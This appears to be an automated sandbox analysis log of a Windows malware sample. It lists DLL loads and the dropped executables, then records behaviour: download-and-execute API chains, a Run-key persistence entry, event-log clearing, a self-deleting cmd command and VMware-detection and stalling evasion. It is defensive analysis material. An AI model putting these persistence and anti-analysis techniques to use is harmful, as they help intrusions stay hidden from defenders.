              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: aclayers.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: sfc.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: sfc_os.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: slc.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: apphelp.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: acgenral.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: winmm.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: samcli.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: msacm32.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: version.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: userenv.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: dwmapi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: urlmon.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: mpr.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: sspicli.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: winmmbase.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: winmmbase.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: iertutil.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: srvcli.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: netutils.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: aclayers.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: sfc.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: wldp.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: propsys.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: profapi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: edputil.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: wintypes.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: appresolver.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: slc.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: sppc.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: pcacli.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: apphelp.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: acgenral.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: winmm.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: samcli.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: msacm32.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: version.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: userenv.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: dwmapi.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: urlmon.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: mpr.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: sspicli.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: winmmbase.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: winmmbase.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: iertutil.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: srvcli.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: netutils.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: aclayers.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: sfc.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: wininet.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: avicap32.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: msvfw32.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: msvcp60.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: netapi32.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: wtsapi32.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: mswsock.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: napinsp.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: wshbth.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: winrnr.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\Temp\server.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: napinsp.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: wshbth.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: mswsock.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: winrnr.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: mpr.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: drprov.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: winsta.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: ntlanman.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: davclnt.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: davhlpr.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: sspicli.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: cscapi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: netutils.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: wkscli.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: winhttp.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: webio.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: winnsi.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\v5.exe | Section loaded: hra33.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: apphelp.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: acgenral.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: uxtheme.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: winmm.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: samcli.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: msacm32.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: version.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: userenv.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: dwmapi.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: urlmon.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: mpr.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: sspicli.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: winmmbase.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: iertutil.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: srvcli.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: netutils.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: aclayers.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: sfc.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: sfc_os.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: oledlg.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: wininet.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: textshaping.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: amsi.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: profapi.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: textinputframework.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: coreuicomponents.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: coremessaging.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: ntmarta.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: wintypes.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: windows.storage.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: wldp.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: propsys.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: edputil.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: appresolver.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: slc.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: sppc.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: ieframe.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: netapi32.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: winhttp.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: wkscli.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: ieproxy.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: policymanager.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: msiso.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: profext.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: secur32.dll
              Source: C:\Windows\Temp\ .exe | Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Windows\Temp\ .exe | Window found: window name: SysTabControl32
              Source: C:\Windows\Temp\ .exe | Automated click: OK
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\Temp\ .exe | Window detected: Number of UI elements: 96
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbg source: .exe, 00000005.00000002.3268806421.0000000003EE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb$ source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1384775691.000000000307F000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000000.1380991211.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268703284.000000000282E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
              Source: v5.exe.0.dr | Static PE information: section name: UPX2
              Source: C:\Windows\Temp\v5.exe | Code function: 2_2_00408FB0 push eax; ret 2_2_00408FDE
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_004046E0 push eax; ret 3_2_0040470E
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_10069820 push eax; ret 3_2_1006984E
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_100FAA45 push edi; ret 3_2_100FAA46
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_10025EF1 push cs; ret 3_2_10025EF2
              Source: C:\Windows\Temp\v5.exe | Code function: 4_2_00408FB0 push eax; ret 4_2_00408FDE
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_004483B0 push eax; ret 5_2_004483CE
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_00447450 push eax; ret 5_2_00447464
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_00447450 push eax; ret 5_2_0044748C
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_00449957 push ecx; ret 5_2_00449967
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
              Source: C:\Windows\Temp\ .exe | File created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | File created: C:\Windows\Temp\ .exe
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | File created: C:\Windows\Temp\server.exe
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | File created: C:\Windows\Temp\v5.exe
              Source: C:\Windows\Temp\server.exe | File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe
              Source: C:\Windows\Temp\v5.exe | Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess, 2_2_0040597D
              Source: C:\Windows\Temp\server.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\Temp\v5.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043D078 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect, 5_2_0043D078
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043A8F0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon, 5_2_0043A8F0
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000A4D0 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog, 3_2_1000A4D0
              Source: C:\Windows\Temp\v5.exe | Code function: 4_2_00407470 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,socket,inet_addr,sendto,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,CreateProcessA,TerminateProcess,Sleep,CreateProcessA,Sleep,TerminateProcess,Sleep,RtlExitUserThread,wsprintfA,Sleep,send,Sleep,RtlExitUserThread,Sleep,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,CreateProcessA,Sleep,TerminateProcess,wsprintfA,wsprintfA,wsprintfA,wsprintfA,send,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,sendto,socket,sendto,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,send,Sleep,send,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,send,wsprintfA,wsprintfA,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 4_2_00407470
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Temp\v5.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Temp\ .exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\Temp\ .exe | Code function: 00-05-69 VMWARE, Inc. 00-0C-29 VMware, Inc. 5_2_00405DB0
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_100022F0 3_2_100022F0
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_10001800 in eax, dx 3_2_10001800
              Source: C:\Windows\Temp\v5.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_4-1365
              Source: C:\Windows\Temp\server.exe | Stalling execution: Execution stalls by calling Sleep graph_3-19524
